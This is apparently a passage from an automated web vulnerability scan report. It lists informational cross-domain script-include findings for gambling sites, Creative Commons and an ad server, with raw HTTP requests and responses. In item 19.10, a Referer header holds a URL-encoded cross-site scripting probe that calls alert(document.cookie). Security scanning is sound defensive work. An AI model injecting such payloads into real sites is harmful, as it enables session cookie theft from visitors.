Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:14:14 GMT
Connection: close
Content-Length: 161996


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
<![endif]-->


<script src="https://ble.hs.llnwd.net/e1/casino/en/df_Master_js_4114_19533.js" type="text/javascript"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.9. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativecommons.org
Path:   /licenses/by-sa/2.5/br/deed.en_US

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /licenses/by-sa/2.5/br/deed.en_US HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Fri, 06 May 2011 23:25:19 GMT
ETag: "4502a-5338-4a2a3cd9055c0"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21304
Date: Mon, 16 May 2011 12:02:07 GMT
X-Varnish: 406080049 406080013
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>


<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

19.10. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=10ca289019af23418475b1d5b7b65193; expires=Tue, 15-May-2012 12:52:09 GMT; path=/
Content-Length: 3694
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90&section=1703625"></SCRIPT>
...[SNIP]...

19.11. http://da.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: da.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dmowgp551rkkdn3soilwdfnr; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:13:58 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: UniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.12. http://da.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: da.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=82gun5s9aot32rckk6dr6ngt71; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=da; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=da; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123277; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540655; expires=Tue, 15-May-2012 12:26:10 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:11 GMT
Connection: close
Content-Length: 23111

<!DOCTYPE html>
<html dir="ltr" lang="da">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Det bedste sted for SJOV online underholdning med gevinster!..| Winnings.com</title>
<link rel="
...[SNIP]...
<link rel="pingback" href="http://da.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.13. http://de.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: de.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1tkc3d3ftxfybx55a2wzek55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.14. http://de.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: de.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=bo2hr723r5jhqb7k8l55c0tsp6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=de; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=de; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103122867; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540255; expires=Tue, 15-May-2012 12:00:03 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:00:04 GMT
Connection: close
Content-Length: 23256

<!DOCTYPE html>
<html dir="ltr" lang="de-DE">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Top-Destination für SPASS Online Winnings Unterhaltung!..| Winnings.com</title>
<link rel="a
...[SNIP]...
<link rel="pingback" href="http://de.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.15. http://el.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://el.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: el.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=m2prtrifja8qi72631j36fguj0; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=el; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=el; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123004; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540388; expires=Tue, 15-May-2012 12:08:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:08:47 GMT
Connection: close
Content-Length: 24824

<!DOCTYPE html>
<html dir="ltr" lang="el">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - .. #1 .................... ...... .................... ...... .................. .... ..........
...[SNIP]...
<link rel="pingback" href="http://el.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.16. http://es.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: es.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x4ssgtmj3jlvc145m24vlpap; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:12:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: UniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.17. http://es.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: es.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=6rfpoaacmos3pqv6u74edo7v02; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=es; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=es; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123528; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540903; expires=Tue, 15-May-2012 12:32:13 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:32:15 GMT
Connection: close
Content-Length: 23226

<!DOCTYPE html>
<html dir="ltr" lang="es-ES">
<head>
<meta charset="UTF-8" />

<title>Winnings.com. ¡El destino nº 1 para la DIVERSIÓN y ganancias online! | Winnings.com</title>
<link rel="a
...[SNIP]...
<link rel="pingback" href="http://es.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.18. http://fi.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: fi.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjfbcr2m41ex5r55rhrnngmf; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:20:15 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: UniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.19. http://fi.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: fi.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=hhfnpksu4siu4pfgu3cjt3vs45; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=fi; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=fi; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123051; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540431; expires=Tue, 15-May-2012 12:10:55 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:10:56 GMT
Connection: close
Content-Length: 23175

<!DOCTYPE html>
<html dir="ltr" lang="fi">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Ykköspaikka HAUSKALLE netin Winnings -viihteelle! | Winnings.com</title>
<link rel="alternate
...[SNIP]...
<link rel="pingback" href="http://fi.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.20. http://fr.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: fr.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bifmqjz1ktedjhqr1owcwx55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:10 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: UniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.21. http://fr.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: fr.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=ct2se4ekv495kv3bi8qnrrbis5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=fr; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=fr; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123274; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540651; expires=Tue, 15-May-2012 12:26:04 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:05 GMT
Connection: close
Content-Length: 23634

<!DOCTYPE html>
<html dir="ltr" lang="fr-FR">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La Destination #1 pour du Divertissement Gagnant En Ligne ! | Winnings.com</title>
<link r
...[SNIP]...
<link rel="pingback" href="http://fr.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.22. http://games.bet365.com/home/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.bet365.com
Path:   /home/en/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:20 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jqaokq45oa00yd45k1sqtdbv; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: session=stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
